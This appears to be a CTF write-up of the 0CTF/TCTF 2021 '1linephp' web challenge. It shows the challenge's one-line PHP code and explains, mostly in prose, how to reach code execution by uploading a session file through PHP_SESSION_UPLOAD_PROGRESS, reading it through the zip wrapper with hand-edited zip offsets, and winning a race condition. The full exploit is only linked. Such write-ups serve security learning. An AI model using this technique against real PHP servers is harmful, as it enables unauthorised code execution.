Profile

i love cat

as3617

0CTF/TCTF 2021 Quals - 1linephp [web]

Description

http://111.186.59.2:50080
http://111.186.59.2:50081
http://111.186.59.2:50082
The three servers are the same, you can choose any one. server will be reset every 10 minutes.

 

this chall is almost same https://blog.orange.tw/2018/10/hitcon-ctf-2018-one-line-php-challenge.html.

 

<?php
($_=@$_GET['yxxx'].'.php') && @substr(file($_)[0],0,6) === '@<?php' ? include($_) : highlight_file(__FILE__) && include('phpinfo.html');

 

but some code is different, we need to find new exploit

We can upload arbitrary session file using PHP_SESSION_UPLOAD_PROGRESS and include session file using various wrapper.
But in this chall, we need to bypass .php, so we can imagine 2 ways for bypass.

 

1. phar wrapper
2. zip wrapper

First i use phar wrapper. but it's impossible!

https://stackoverflow.com/questions/59302726/include-php-phar-without-phar-extension
Then, Maybe we can use second way for exploit.

https://github.com/p4-team/ctf/tree/master/2016-04-15-plaid-ctf/web_pixelshop
by accident, i found this writeup and it has very useful information.

zip file is not required for starting with PK signature.
If we define proper offset for the zip file, there is no need to start with zip file signature at start of file.
And we can simply calculate the ZIP offsets by hand!

 

image

 

image

 

we need to change two offset in zip.
just change Local Header Offset in Central Directory File Header and Central Header Offset in End of Central Directory Record.

These offsets specify the starting location of the header of the zip file. So we can unzip our payload independent of session prefix.

 

On server session.upload_progress.cleanup is enable. so we need to using race condition.

then we can get flag!

My exploit :

https://gist.github.com/as3617/50d598ede736d81bc57804e4d19700e5